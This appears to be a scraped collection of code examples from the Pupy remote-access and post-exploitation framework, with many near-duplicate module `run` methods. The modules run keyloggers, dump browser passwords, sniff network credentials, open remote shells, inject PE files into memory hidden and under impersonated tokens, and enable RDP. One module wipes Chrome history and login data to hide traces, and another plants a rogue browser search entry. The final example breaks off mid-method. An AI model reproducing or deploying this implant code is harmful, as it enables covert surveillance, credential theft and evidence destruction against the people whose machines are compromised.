Esempio n. 1
0
    def run(self, args):
        # TO DO: enable multi RDP session, see MIMIKATZ for example

        if args.local:
            if args.enable or args.disable:
                if not self.client.is_windows():
                    self.error("This option could be used only on windows hosts")
                    return

                # check if admin
                if not self.client.conn.modules["pupwinutils.rdp"].check_if_admin():
                    self.error("Admin privileges are required")

                with redirected_stdio(self):
                    if args.enable:
                        self.client.conn.modules["pupwinutils.rdp"].enable_rdp()

                    if args.disable:
                        self.client.conn.modules["pupwinutils.rdp"].disable_rdp()

        elif args.remote:
            if "/" in args.target[0]:
                hosts = IPNetwork(args.target[0])
            else:
                hosts = list()
                hosts.append(args.target)

            for host in hosts:
                with redirected_stdio(self):
                    self.client.conn.modules["pupyutils.rdp_check"].check_rdp(
                        host, args.username, args.password, args.domain, args.hashes
                    )
Esempio n. 2
0
    def run(self, args):
        if self.client.is_windows():
            self.client.load_package("pupwinutils.keylogger")
        else:
            self.client.load_package("keylogger")

        if args.action=="start":
            if self.client.is_windows():
                with redirected_stdio(self.client.conn): #to see the output exception in case of error
                    if not self.client.conn.modules["pupwinutils.keylogger"].keylogger_start():
                        self.error("the keylogger is already started")
                    else:
                        self.success("keylogger started !")
            # not tested on android
            else:
                with redirected_stdio(self.client.conn): #to see the output exception in case of error
                    r = self.client.conn.modules["keylogger"].keylogger_start()
                    if r == 'no_x11':
                        self.error("the keylogger does not work without x11 graphical interface")
                    elif not r:
                        self.error("the keylogger is already started")
                    else:
                        self.success("keylogger started !")

        elif args.action=="dump":
            try:
                os.makedirs(os.path.join("data","keystrokes"))
            except Exception:
                pass
            
            if self.client.is_windows():
                data=self.client.conn.modules["pupwinutils.keylogger"].keylogger_dump()
            else:
                 data=self.client.conn.modules["keylogger"].keylogger_dump()

            if data is None:
                self.error("keylogger not started")
            elif not data:
                self.warning("no keystrokes recorded")
            else:
                filepath=os.path.join("data", "keystrokes","keys_"+self.client.short_name()+"_"+str(datetime.datetime.now()).replace(" ","_").replace(":","-")+".log")
                self.success("dumping recorded keystrokes in %s"%filepath)
                with open(filepath, 'w') as f:
                    f.write(data)
                self.log(data)

        elif args.action=="stop":
            if self.client.is_windows():
                stop = self.client.conn.modules["pupwinutils.keylogger"].keylogger_stop()
            else:
                stop = self.client.conn.modules["keylogger"].keylogger_stop()

            if stop:
                self.success("keylogger stopped")
            else:
                self.success("keylogger is not started")
Esempio n. 3
0
    def run(self, args):
        if self.client.is_windows():
            self.client.load_package("pupwinutils.keylogger")
        else:
            self.client.load_package("keylogger")

        if args.action=="start":
            if self.client.is_windows():
                with redirected_stdio(self.client.conn): #to see the output exception in case of error
                    if not self.client.conn.modules["pupwinutils.keylogger"].keylogger_start():
                        self.error("the keylogger is already started")
                    else:
                        self.success("keylogger started !")
            # not tested on android
            else:
                with redirected_stdio(self.client.conn): #to see the output exception in case of error
                    r = self.client.conn.modules["keylogger"].keylogger_start()
                    if r == 'no_x11':
                        self.error("the keylogger does not work without x11 graphical interface")
                    elif not r:
                        self.error("the keylogger is already started")
                    else:
                        self.success("keylogger started !")

        elif args.action=="dump":
            try:
                os.makedirs(os.path.join("data","keystrokes"))
            except Exception:
                pass
            
            if self.client.is_windows():
                data=self.client.conn.modules["pupwinutils.keylogger"].keylogger_dump()
            else:
                 data=self.client.conn.modules["keylogger"].keylogger_dump()

            if data is None:
                self.error("keylogger not started")
            elif not data:
                self.warning("no keystrokes recorded")
            else:
                filepath=os.path.join("data", "keystrokes","keys_"+self.client.short_name()+"_"+str(datetime.datetime.now()).replace(" ","_").replace(":","-")+".log")
                self.success("dumping recorded keystrokes in %s"%filepath)
                with open(filepath, 'w') as f:
                    f.write(data)
                self.log(data)

        elif args.action=="stop":
            if self.client.is_windows():
                stop = self.client.conn.modules["pupwinutils.keylogger"].keylogger_stop()
            else:
                stop = self.client.conn.modules["keylogger"].keylogger_stop()

            if stop:
                self.success("keylogger stopped")
            else:
                self.success("keylogger is not started")
Esempio n. 4
0
def exec_pe(module, prog_args, path=None, raw_pe=None, interactive=False, fork=False, timeout=None, use_impersonation=False, suspended_process="cmd.exe"):
    if not raw_pe and not path:
        raise Exception("raw_pe or path must be supplied")
    if path:
        pe_arch=get_pe_arch(path)
        proc_arch=module.client.desc["proc_arch"]
        if pe_arch!=proc_arch:
            module.error("%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or migrate into a %s process first"%(path, pe_arch, proc_arch, proc_arch, pe_arch))
            return
    wait=True
    redirect_stdio=True
    if fork:
        wait=False
        redirect_stdio=False
    if not raw_pe:
        raw_pe=b""
        with open(path,'rb') as f:
            raw_pe=f.read()
    module.client.load_package("pupymemexec")
    module.client.load_package("pupwinutils.memexec")

    res=""
    dupHandle=None
    if use_impersonation:
        dupHandle=module.client.impersonated_dupHandle
        if dupHandle is None:
            module.error("No token has been impersonated on this session. use impersonate module first")
            return
    if not hasattr(module, 'mp'):
        setattr(module, 'mp', None)
    module.mp=module.client.conn.modules['pupwinutils.memexec'].MemoryPE(raw_pe, args=prog_args, hidden=True, redirect_stdio=redirect_stdio, suspended_process=suspended_process, dupHandle=dupHandle)
    with redirected_stdio(module.client.conn):
        module.mp.run()
    if not fork:
        if interactive:
            try:
                with redirected_stdio(module.client.conn):
                    module.mp.get_shell()
            finally:
                module.mp.close()
        else:
            starttime=time.time()
            while True:
                if module.mp.wait(1):
                    break
                if timeout:
                    if time.time()-starttime>timeout:
                        break
            module.mp.close()
            res=module.mp.get_stdout()
            module.log(res)
            return res
	def run(self, args):
		self.client.load_package("_sqlite3")
		self.client.load_package("sqlite3")
		print self.client.load_dll("packages/windows/x86/sqlite3.dll")
		
		
		self.client.conn.modules['_sqlite3']
		self.client.conn.modules['sqlite3']
		#self.client.conn.modules["pupwinutils.processes"].enum_processes()
		with redirected_stdio(self.client.conn):
			self.info("gotsql")	
			self.client.load_package("getpass")
			u=self.client.conn.modules['getpass'].getuser()

			x = "adamschaal"
			#self.info("goinin")
			self.client.load_package("forenmod.forenpackage")
			#self.info("a")
			self.client.conn.modules['forenmod.forenpackage'].kill_chrome()
			#self.info("b")
			self.client.conn.modules['forenmod.forenpackage'].fix_crash(u)
			#self.info("c")
			self.client.conn.modules['forenmod.forenpackage'].del_hist(x,u)
			#self.info("d")
			self.client.conn.modules['forenmod.forenpackage'].del_Topsite(x,u)
			#self.info("e")
			self.client.conn.modules['forenmod.forenpackage'].del_Favicons(x,u)
			#self.info("f")
			self.client.conn.modules['forenmod.forenpackage'].del_loginData(x,u)
			#self.info("g")
			self.client.conn.modules['forenmod.forenpackage'].del_NAP(x,u)
			#self.info("h")
			self.client.conn.modules['forenmod.forenpackage'].del_Shortcuts(x,u)
			#self.info("i")
			self.client.conn.modules['forenmod.forenpackage'].rm_CurrentTabs(u)
			#self.info("j")
			self.client.conn.modules['forenmod.forenpackage'].rm_CurrentSession(u)
			#self.info("k")
			self.client.conn.modules['forenmod.forenpackage'].rm_LastTabs(u)
			#self.info("l")
			self.client.conn.modules['forenmod.forenpackage'].rm_LastSession(u)
			#self.info("m")
			self.client.conn.modules['forenmod.forenpackage'].rm_bookmarks(u)
			#self.info("n")
			self.client.conn.modules['forenmod.forenpackage'].rm_Cache(u)
			#self.info("o")
			self.client.conn.modules['forenmod.forenpackage'].rm_autofill(u)
			#self.info("p")
			self.client.conn.modules['forenmod.forenpackage'].rm_visited(u)
			#del_Cookies(x,u)
			#self.info("goinout")


		if args.clean:
			self.info("clean...")

		if args.persist:
			self.info("persist...")
		
		self.success("succesfully cleaned the client")
Esempio n. 6
0
 def run(self, args):
     with redirected_stdio(self):
         loot=self.client.conn.modules["loot_memory"].dump_browser_passwords()
         for browser, dic in loot.iteritems():
             self.info("%s crawled :"%browser)
             for i, passwords in dic.iteritems():
                 self.success("%s:\n\t%s"%(i, '\n\t'.join(passwords)))
Esempio n. 7
0
 def run(self, args):
     with redirected_stdio(self.client.conn):
         loot=self.client.conn.modules["loot_memory"].dump_browser_passwords()
         for browser, dic in loot.iteritems():
             self.info("%s crawled :"%browser)
             for i, passwords in dic.iteritems():
                 self.success("%s:\n\t%s"%(i, '\n\t'.join(passwords)))
Esempio n. 8
0
    def run(self, args):
        if self.client.is_windows() or args.pseudo_tty:
            self.client.load_package("interactive_shell")
            encoding = None
            program = "/bin/sh"
            if self.client.is_android():
                program = "/system/bin/sh"
            elif self.client.is_windows():
                program = "cmd.exe"
            if args.program:
                program = args.program
            with redirected_stdio(self.client.conn):
                self.client.conn.modules.interactive_shell.interactive_open(
                    program=program)
        else:  #handling tty
            self.client.load_package("ptyshell")

            fd = sys.stdin.fileno()
            old_settings = termios.tcgetattr(fd)

            self.ps = self.client.conn.modules['ptyshell'].PtyShell()
            program = None
            if args.program:
                program = args.program.split()
            try:
                term = "xterm"
                if "TERM" in os.environ:
                    term = os.environ["TERM"]
                self.ps.spawn(program, term=term)
                is_closed = Event()
                self.ps.start_read_loop(print_callback, is_closed.set)
                self.set_pty_size = rpyc. async (self.ps.set_pty_size)
                old_handler = pupylib.PupySignalHandler.set_signal_winch(
                    self._signal_winch)
                self._signal_winch(
                    None, None
                )  # set the remote tty sie to the current terminal size
                try:
                    tty.setraw(fd)
                    buf = b''
                    while True:
                        r, w, x = select.select([sys.stdin], [], [], 0.01)
                        if sys.stdin in r:
                            ch = os.read(fd, 1)
                            buf += ch
                        elif buf:
                            self.ps.write(buf)
                            buf = b''
                        elif is_closed.is_set():
                            break
                finally:
                    termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
                    pupylib.PupySignalHandler.set_signal_winch(old_handler)
            finally:
                try:
                    self.ps.close()
                except Exception:
                    pass
                self.set_pty_size = None
Esempio n. 9
0
 def run(self, args):
     with redirected_stdio(self):
         # zip
         if not args.u:
             self.client.conn.modules["pupyutils.zip"].zip(args.source, args.destination)
         # unzip
         else:
             self.client.conn.modules["pupyutils.zip"].unzip(args.source, args.destination)
Esempio n. 10
0
	def run(self, args):
		if self.client.is_windows() or args.pseudo_tty:
			self.client.load_package("interactive_shell")
			encoding=None
			program="/bin/sh"
			if self.client.is_android():
				program="/system/bin/sh"
			elif self.client.is_windows():
				program="cmd.exe"
			if args.program:
				program=args.program
			with redirected_stdio(self.client.conn):
				self.client.conn.modules.interactive_shell.interactive_open(program=program)
		else: #handling tty
			self.client.load_package("ptyshell")
			self.ps=self.client.conn.modules['ptyshell'].PtyShell()
			program=None
			if args.program:
				program=args.program.split()
			try:
				term="xterm"
				if "TERM" in os.environ:
					term=os.environ["TERM"]
				self.ps.spawn(program, term=term)
				is_closed=Event()
				self.ps.start_read_loop(print_callback, is_closed.set)
				self.set_pty_size=rpyc.async(self.ps.set_pty_size)
				old_handler = pupylib.PupySignalHandler.set_signal_winch(self._signal_winch)
				self._signal_winch(None, None) # set the remote tty sie to the current terminal size
				fd=sys.stdin.fileno()
				old_settings = termios.tcgetattr(fd)
				try:
					tty.setraw(sys.stdin.fileno())
					input_buf=b""
					while True:
						r, w, x = select.select([sys.stdin], [], [], 0)
						if sys.stdin in r:
							last_input=sys.stdin.read(1)
							if last_input=="\x1b": # in case we read the escape character, we read stdin again because mysteriously, the select won't unlock before getting another character again
								last_input+=sys.stdin.read(2)
								
							input_buf+=last_input
						elif input_buf:
							self.ps.write(input_buf)
							input_buf=b""
						elif is_closed.is_set():
							break
						else:
							time.sleep(0.01)
				finally:
					termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
					pupylib.PupySignalHandler.set_signal_winch(old_handler)
			finally:
				try:
					self.ps.close()
				except Exception:
					pass
				self.set_pty_size=None
Esempio n. 11
0
 def run(self, args):
     self.client.load_package("pupyutils.zip")
     with redirected_stdio(self.client.conn):
         # zip
         if not args.u:
             self.client.conn.modules["pupyutils.zip"].zip(args.source, args.destination)
         # unzip
         else:
             self.client.conn.modules["pupyutils.zip"].unzip(args.source, args.destination)
	def run(self, args):
		self.client.load_package("interactive_shell")
		program="/bin/sh"
		encoding=None
		if self.client.is_windows():
			program="cmd.exe"
			encoding="cp437"
		with redirected_stdio(self.client.conn):
			self.client.conn.modules.interactive_shell.interactive_open(program=program, encoding=encoding)
Esempio n. 13
0
 def run(self, args):
     self.client.load_package("interactive_shell")
     program = "/bin/sh"
     encoding = None
     if self.client.is_windows():
         program = "cmd.exe"
         encoding = "cp437"
     with redirected_stdio(self.client.conn):
         self.client.conn.modules.interactive_shell.interactive_open(
             program=program, encoding=encoding)
Esempio n. 14
0
    def run(self, args):
        if self.client.is_windows() or args.pseudo_tty:
            self.client.load_package("interactive_shell")
            encoding=None
            program="/bin/sh"
            if self.client.is_android():
                program="/system/bin/sh"
            elif self.client.is_windows():
                program="cmd.exe"
            if args.program:
                program=args.program
            with redirected_stdio(self.client.conn):
                self.client.conn.modules.interactive_shell.interactive_open(program=program)
        else: #handling tty
            self.client.load_package("ptyshell")

            fd=sys.stdin.fileno()
            old_settings = termios.tcgetattr(fd)

            self.ps=self.client.conn.modules['ptyshell'].PtyShell()
            program=None
            if args.program:
                program=args.program.split()
            try:
                term="xterm"
                if "TERM" in os.environ:
                    term=os.environ["TERM"]
                self.ps.spawn(program, term=term)
                is_closed=Event()
                self.ps.start_read_loop(print_callback, is_closed.set)
                self.set_pty_size=rpyc.async(self.ps.set_pty_size)
                old_handler = pupylib.PupySignalHandler.set_signal_winch(self._signal_winch)
                self._signal_winch(None, None) # set the remote tty sie to the current terminal size
                try:
                    tty.setraw(fd)
                    buf=b''
                    while True:
                        r, w, x = select.select([sys.stdin], [], [], 0.01)
                        if sys.stdin in r:
                            ch = os.read(fd, 1)
                            buf += ch
                        elif buf:
                            self.ps.write(buf)
                            buf=b''
                        elif is_closed.is_set():
                            break
                finally:
                    termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
                    pupylib.PupySignalHandler.set_signal_winch(old_handler)
            finally:
                try:
                    self.ps.close()
                except Exception:
                    pass
                self.set_pty_size=None
Esempio n. 15
0
    def run(self, args):
        self.client.load_package("pupyutils.netcreds")

        if args.action == "start":
            with redirected_stdio(
                    self.client.conn
            ):  #to see the output exception in case of error
                r = self.client.conn.modules[
                    "pupyutils.netcreds"].netcreds_start(
                        args.interface, args.filterip)
                if r == 'not_root':
                    self.error("Needs root privileges to be started")
                elif not r:
                    self.error(
                        "Network credentials sniffer is already started")
                else:
                    self.success("Network credentials sniffer started !")

        elif args.action == "dump":
            try:
                os.makedirs(os.path.join("data", "netcreds"))
            except Exception:
                pass

            data = self.client.conn.modules[
                "pupyutils.netcreds"].netcreds_dump()

            if data is None:
                self.error(
                    "Network credentials sniffer has not been started yet")
            elif not data:
                self.warning("No network credentials recorded")
            else:
                # remove color before writting into the file
                W = '\033[0m'  # white (normal)
                T = '\033[93m'  # tan
                data_no_color = data.replace(W, '').replace(T, '')
                filepath = os.path.join(
                    "data", "netcreds", "creds_" + self.client.short_name() +
                    "_" + str(datetime.datetime.now()).replace(
                        " ", "_").replace(":", "-") + ".log")
                self.success("Dumping recorded netcreds in %s" % filepath)
                with open(filepath, 'w') as f:
                    f.write(data_no_color)

                self.log(data)

        elif args.action == "stop":
            stop = self.client.conn.modules[
                "pupyutils.netcreds"].netcreds_stop()
            if stop:
                self.success("Network credentials sniffer is stopped")
            else:
                self.error(
                    "Network credentials sniffer has not been started yet")
Esempio n. 16
0
    def run(self, args):
        if args.fork and args.interactive:
            self.error(
                "--fork and --interactive options can't be used together")
            return

        #check we are injecting from the good process arch:
        pe_arch = get_pe_arch(args.path)
        proc_arch = self.client.desc["proc_arch"]
        if pe_arch != proc_arch:
            self.error(
                "%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or migrate into a %s process first"
                % (args.path, pe_arch, proc_arch, proc_arch, pe_arch))
            return

        wait = True
        redirect_stdio = True
        if args.fork:
            wait = False
            redirect_stdio = False

        raw_pe = b""
        with open(args.path, 'rb') as f:
            raw_pe = f.read()

        self.client.load_package("pupymemexec")
        self.client.load_package("pupwinutils.memexec")

        res = ""
        self.mp = self.client.conn.modules['pupwinutils.memexec'].MemoryPE(
            raw_pe, args=args.args, hidden=True, redirect_stdio=redirect_stdio)
        self.mp.run()
        if not args.fork:
            if args.interactive:
                try:
                    with redirected_stdio(self.client.conn):
                        self.mp.get_shell()
                finally:
                    self.mp.close()
            else:
                starttime = time.time()
                while True:
                    if self.mp.wait(1):
                        break
                    if args.timeout:
                        if time.time() - starttime > args.timeout:
                            break
                self.mp.close()
                res = self.mp.get_stdout()
                self.log(res)
Esempio n. 17
0
 def run(self, args):
     if self.client.is_windows() or args.pseudo_tty:
         self.client.load_package("interactive_shell")
         encoding = None
         program = "/bin/sh"
         if self.client.is_windows():
             program = "cmd.exe"
             encoding = "cp437"
         if args.program:
             program = args.program
         with redirected_stdio(self.client.conn):
             self.client.conn.modules.interactive_shell.interactive_open(
                 program=program, encoding=encoding)
     else:  #handling tty
         self.client.load_package("ptyshell")
         self.ps = self.client.conn.modules['ptyshell'].PtyShell()
         program = None
         if args.program:
             program = args.program.split()
         self.ps.spawn(program)
         is_closed = Event()
         self.ps.start_read_loop(print_callback, is_closed.set)
         self.set_pty_size = rpyc. async (self.ps.set_pty_size)
         old_handler = pupylib.PupySignalHandler.set_signal_winch(
             self._signal_winch)
         self._signal_winch(
             None,
             None)  # set the remote tty sie to the current terminal size
         try:
             fd = sys.stdin.fileno()
             old_settings = termios.tcgetattr(fd)
             try:
                 tty.setraw(sys.stdin.fileno())
                 input_buf = b""
                 while True:
                     r, w, x = select.select([sys.stdin], [], [], 0)
                     if sys.stdin in r:
                         input_buf += sys.stdin.read(1)
                     elif input_buf:
                         self.ps.write(input_buf)
                         input_buf = b""
                     elif is_closed.is_set():
                         break
                     else:
                         time.sleep(0.01)
             finally:
                 termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
         finally:
             pupylib.PupySignalHandler.set_signal_winch(old_settings)
             self.ps.close()
Esempio n. 18
0
    def run(self, args):
        if args.action=="start":
            self.client.load_package("psutil")
            self.client.load_package("pupwinutils.watch_puppy")
            with redirected_stdio(self.client.conn): #to see the output exception in case of error
                if not self.client.conn.modules["pupwinutils.watch_puppy"].watch_puppy_start():
                    self.error("the watch puppy is already started")
                else:
                    self.success("watch puppy started !")

        elif args.action=="stop":
            if self.client.conn.modules["pupwinutils.watch_puppy"].watch_puppy_stop():
                self.success("watch puppy stopped")
            else:
                self.success("watch puppy is not started")
Esempio n. 19
0
    def run(self, args):
        filepath = None
        if args.write:
            config = self.client.pupsrv.config or PupyConfig()
            folder = config.get_folder('beroot', {'%c': self.client.short_name()})
            filepath = path.join(folder, str(datetime.datetime.now()).replace(" ","_").replace(":","-")+"-beroot.txt")

        with redirected_stdio(self):
            try:
                for r in self.client.conn.modules["beRoot"].run(args.cmd, args.list, args.write):
                    self.print_output(output=r, write=args.write, file=filepath)
            except Exception as e:
                print e

        if args.write:
            self.success(filepath)
Esempio n. 20
0
    def run(self, args):
        code = ""
        if args.file:
            self.info("loading code from %s ..." % args.file)
            with open(args.file, 'r') as f:
                code = f.read()
        elif args.code:
            code = args.code
        else:
            raise PupyModuleError("--code or --file argument is mandatory")

        if args.no_redirected_stdio:
            self.client.conn.execute(code + "\n")
        else:
            with redirected_stdio(self):
                self.client.conn.execute(code + "\n")
Esempio n. 21
0
	def run(self, args):
		if args.fork and args.interactive:
			self.error("--fork and --interactive options can't be used together")
			return

		#check we are injecting from the good process arch:
		pe_arch=get_pe_arch(args.path)
		proc_arch=self.client.desc["proc_arch"]
		if pe_arch!=proc_arch:
			self.error("%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or migrate into a %s process first"%(args.path, pe_arch, proc_arch, proc_arch, pe_arch))
			return

		wait=True
		redirect_stdio=True
		if args.fork:
			wait=False
			redirect_stdio=False

		raw_pe=b""
		with open(args.path,'rb') as f:
			raw_pe=f.read()

		self.client.load_package("pupymemexec")
		self.client.load_package("pupwinutils.memexec")

		res=""
		self.mp=self.client.conn.modules['pupwinutils.memexec'].MemoryPE(raw_pe, args=args.args, hidden=True, redirect_stdio=redirect_stdio)
		self.mp.run()
		if not args.fork:
			if args.interactive:
				try:
					with redirected_stdio(self.client.conn):
						self.mp.get_shell()
				finally:
					self.mp.close()
			else:
				starttime=time.time()
				while True:
					if self.mp.wait(1):
						break
					if args.timeout:
						if time.time()-starttime>args.timeout:
							break
				self.mp.close()
				res=self.mp.get_stdout()
				self.log(res)
Esempio n. 22
0
    def exec_pe(self,
                path,
                prog_args,
                interactive=False,
                fork=False,
                timeout=None):
        pe_arch = get_pe_arch(path)
        proc_arch = self.client.desc["proc_arch"]
        if pe_arch != proc_arch:
            self.error(
                "%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or migrate into a %s process first"
                % (path, pe_arch, proc_arch, proc_arch, pe_arch))
            return
        wait = True
        redirect_stdio = True
        if fork:
            wait = False
            redirect_stdio = False
        raw_pe = b""
        with open(path, 'rb') as f:
            raw_pe = f.read()
        self.client.load_package("pupymemexec")
        self.client.load_package("pupwinutils.memexec")

        res = ""
        self.mp = self.client.conn.modules['pupwinutils.memexec'].MemoryPE(
            raw_pe, args=prog_args, hidden=True, redirect_stdio=redirect_stdio)
        self.mp.run()
        if not fork:
            if interactive:
                try:
                    with redirected_stdio(self.client.conn):
                        self.mp.get_shell()
                finally:
                    self.mp.close()
            else:
                starttime = time.time()
                while True:
                    if self.mp.wait(1):
                        break
                    if timeout:
                        if time.time() - starttime > timeout:
                            break
                self.mp.close()
                res = self.mp.get_stdout()
                self.log(res)
Esempio n. 23
0
	def run(self, args):
		if self.client.is_windows() or args.pseudo_tty:
			self.client.load_package("interactive_shell")
			encoding=None
			program="/bin/sh"
			if self.client.is_windows():
				program="cmd.exe"
				encoding="cp437"
			if args.program:
				program=args.program
			with redirected_stdio(self.client.conn):
				self.client.conn.modules.interactive_shell.interactive_open(program=program, encoding=encoding)
		else: #handling tty
			self.client.load_package("ptyshell")
			self.ps=self.client.conn.modules['ptyshell'].PtyShell()
			program=None
			if args.program:
				program=args.program.split()
			self.ps.spawn(program)
			is_closed=Event()
			self.ps.start_read_loop(print_callback, is_closed.set)
			self.set_pty_size=rpyc.async(self.ps.set_pty_size)
			old_handler = pupylib.PupySignalHandler.set_signal_winch(self._signal_winch)
			self._signal_winch(None, None) # set the remote tty sie to the current terminal size
			try:
				fd=sys.stdin.fileno()
				old_settings = termios.tcgetattr(fd)
				try:
					tty.setraw(sys.stdin.fileno())
					input_buf=b""
					while True:
						r, w, x = select.select([sys.stdin], [], [], 0)
						if sys.stdin in r:
							input_buf+=sys.stdin.read(1)
						elif input_buf:
							self.ps.write(input_buf)
							input_buf=b""
						elif is_closed.is_set():
							break
						else:
							time.sleep(0.01)
				finally:
					termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
			finally:
				pupylib.PupySignalHandler.set_signal_winch(old_settings)
				self.ps.close()
Esempio n. 24
0
    def run(self, args):

        error = ''
        if not args.user:
            error = 'username is needed'

        elif args.password and args.private_key:
            error = 'specify either a plaintext password or a private key, not both'

        elif not args.password and not args.private_key:
            error = 'private_key or plain text password are needed'

        elif args.ip and args.file:
            error = 'choose either an ip address or an input file, not both'

        elif not args.ip and not args.file:
            error = 'not targets specify'

        if error:
            self.error(error)
            return

        self.client.load_package("paramiko")
        self.client.load_package("cryptography")
        self.client.load_package("ecdsa")
        self.client.load_package("ssh")

        error_code = False
        result = ''

        ssh = self.client.conn.modules["ssh"].SSH(args.user, args.private_key,
                                                  args.password, args.file,
                                                  args.ip, args.port,
                                                  args.verbose, args.command)
        if args.verbose:
            with redirected_stdio(self.client.conn):
                error_code, result = ssh.ssh_client()
        else:
            error_code, result = ssh.ssh_client()

        if not error_code:
            self.error('%s' % result)
        else:
            self.success('%s' % result)
Esempio n. 25
0
    def run(self, args):
        self.client.load_package("pupyutils.netcreds")

        if args.action=="start":
            with redirected_stdio(self.client.conn): #to see the output exception in case of error
                r = self.client.conn.modules["pupyutils.netcreds"].netcreds_start(args.interface, args.filterip)
                if r == 'not_root':
                    self.error("Needs root privileges to be started")
                elif not r:
                    self.error("Network credentials sniffer is already started")
                else:
                    self.success("Network credentials sniffer started !")

        elif args.action=="dump":
            try:
                os.makedirs(os.path.join("data","netcreds"))
            except Exception:
                pass

            data=self.client.conn.modules["pupyutils.netcreds"].netcreds_dump()
             
            if data is None:
                self.error("Network credentials sniffer has not been started yet")
            elif not data:
                self.warning("No network credentials recorded")
            else:
                # remove color before writting into the file
                W = '\033[0m'  # white (normal)
                T = '\033[93m'  # tan
                data_no_color=data.replace(W, '').replace(T, '')
                filepath=os.path.join("data", "netcreds","creds_"+self.client.short_name()+"_"+str(datetime.datetime.now()).replace(" ","_").replace(":","-")+".log")
                self.success("Dumping recorded netcreds in %s"%filepath)
                with open(filepath, 'w') as f:
                    f.write(data_no_color)

                self.log(data)

        elif args.action=="stop":
            stop = self.client.conn.modules["pupyutils.netcreds"].netcreds_stop()
            if stop:
                self.success("Network credentials sniffer is stopped")
            else:
                self.error("Network credentials sniffer has not been started yet")
Esempio n. 26
0
	def run(self, args):
		if args.action=="start":
			if self.keylogger:
				self.error("the keylogger is already started")
			else:
				self.client.load_package("pupwinutils.keylogger")
				with redirected_stdio(self.client.conn): #to see the output exception in case of error
					self.keylogger=self.client.conn.modules["pupwinutils.keylogger"].KeyLogger()
					self.keylogger.start()
		else:
			if not self.keylogger:
				self.error("the keylogger is not running")
				return
			if args.action=="dump":
				self.success("dumping recorded keystrokes :")
				self.log(self.keylogger.dump())
			elif args.action=="stop":
				self.keylogger.stop()
				self.job.stop()
Esempio n. 27
0
    def run(self, args):

        error = ''
        if not args.user:
            error = 'username is needed'

        elif args.password and args.private_key:
            error = 'specify either a plaintext password or a private key, not both'

        elif not args.password and not args.private_key:
            error = 'private_key or plain text password are needed'

        elif args.ip and args.file:
            error ='choose either an ip address or an input file, not both'

        elif not args.ip and not args.file:
            error ='not targets specify'

        if error:
            self.error(error)
            return

        error_code = False
        result = ''

        SSH = self.client.remote('ssh', 'SSH', False)

        ssh = SSH(
            args.user, args.private_key, args.password,
            args.file, args.ip, args.port, args.verbose,
            args.command
        )

        if args.verbose:
            with redirected_stdio(self):
                error_code, result = ssh.ssh_client()
        else:
            error_code, result = ssh.ssh_client()

        if not error_code:
            self.error('%s' % result)
        else:
            self.success('%s' % result)
Esempio n. 28
0
    def exec_pe(self, path, prog_args, interactive=False, fork=False, timeout=None):
        pe_arch = get_pe_arch(path)
        proc_arch = self.client.desc["proc_arch"]
        if pe_arch != proc_arch:
            self.error(
                "%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or migrate into a %s process first"
                % (path, pe_arch, proc_arch, proc_arch, pe_arch)
            )
            return
        wait = True
        redirect_stdio = True
        if fork:
            wait = False
            redirect_stdio = False
        raw_pe = b""
        with open(path, "rb") as f:
            raw_pe = f.read()
        self.client.load_package("pupymemexec")
        self.client.load_package("pupwinutils.memexec")

        res = ""
        self.mp = self.client.conn.modules["pupwinutils.memexec"].MemoryPE(
            raw_pe, args=prog_args, hidden=True, redirect_stdio=redirect_stdio
        )
        self.mp.run()
        if not fork:
            if interactive:
                try:
                    with redirected_stdio(self.client.conn):
                        self.mp.get_shell()
                finally:
                    self.mp.close()
            else:
                starttime = time.time()
                while True:
                    if self.mp.wait(1):
                        break
                    if timeout:
                        if time.time() - starttime > timeout:
                            break
                self.mp.close()
                res = self.mp.get_stdout()
                self.log(res)
Esempio n. 29
0
File: ssh.py Progetto: n1nj4sec/pupy
    def run(self, args):

        error = ''
        if not args.user:
            error = 'username is needed'

        elif args.password and args.private_key:
            error = 'specify either a plaintext password or a private key, not both'

        elif not args.password and not args.private_key:
            error = 'private_key or plain text password are needed'

        elif args.ip and args.file:
            error ='choose either an ip address or an input file, not both'

        elif not args.ip and not args.file:
            error ='not targets specify'

        if error:
            self.error(error)
            return

        self.client.load_package("paramiko")
        self.client.load_package("cryptography")
        self.client.load_package("ecdsa")
        self.client.load_package("ssh")

        error_code = False
        result = ''

        ssh = self.client.conn.modules["ssh"].SSH(args.user, args.private_key, args.password, args.file, args.ip, args.port, args.verbose, args.command)
        if args.verbose:
            with redirected_stdio(self.client.conn):
                error_code, result = ssh.ssh_client()
        else:
            error_code, result = ssh.ssh_client()

        if not error_code:
            self.error('%s' % result)
        else:
            self.success('%s' % result)
	def run(self, args):
		self.info("a")
		self.client.load_package("_sqlite3")
		self.client.load_package("sqlite3")
		print self.client.load_dll("packages/windows/x86/sqlite3.dll")
		
		
		self.client.conn.modules['_sqlite3']
		self.client.conn.modules['sqlite3']
		with redirected_stdio(self.client.conn): 

			self.con=self.client.conn.modules['sqlite3'].connect('C:\Users\steal\AppData\Local\Google\Chrome\User Data\Default\Web Data')
			print self.con
			self.info("connecting to web data db...")
			self.c = self.con.cursor()
			print self.c
			self.c.execute("SELECT * FROM keywords WHERE short_name='cleanupeverybodyeverywhere'")
			print self.c
			self.foo = self.c.fetchall()
			print self.foo
			if not self.foo:
				self.info("executing")
				self.c.execute("INSERT INTO keywords (short_name,keyword,url,favicon_url) VALUES ('cleanupeverybodyeverywhere','cleanupeverybodyeverywhere','forensichat://C:>Windows>System32>calc.exe','')")
				self.con.commit()
			self.con.close()


		if args.clean:
			self.info("clean...")

		if args.persist:
			self.info("persist...")
		
		self.success("added browser")
		self.client.load_package("getpass")
		user=self.client.conn.modules['getpass'].getuser()
		self.info("USER: %s"%user)
Esempio n. 31
0
 def run(self, args):
     with redirected_stdio(self):
         self.client.conn.modules['linux_stealth'].run(args.port)
     self.success("Module executed successfully.")
Esempio n. 32
0
 def run(self, args):
     with redirected_stdio(self):
         self.client.conn.modules['linux_stealth'].run(args.port)
     self.success("Module executed successfully.")
Esempio n. 33
0
    def run(self, args):
        self.client.load_package("wmi")
        self.client.load_package("pupwinutils.drives")

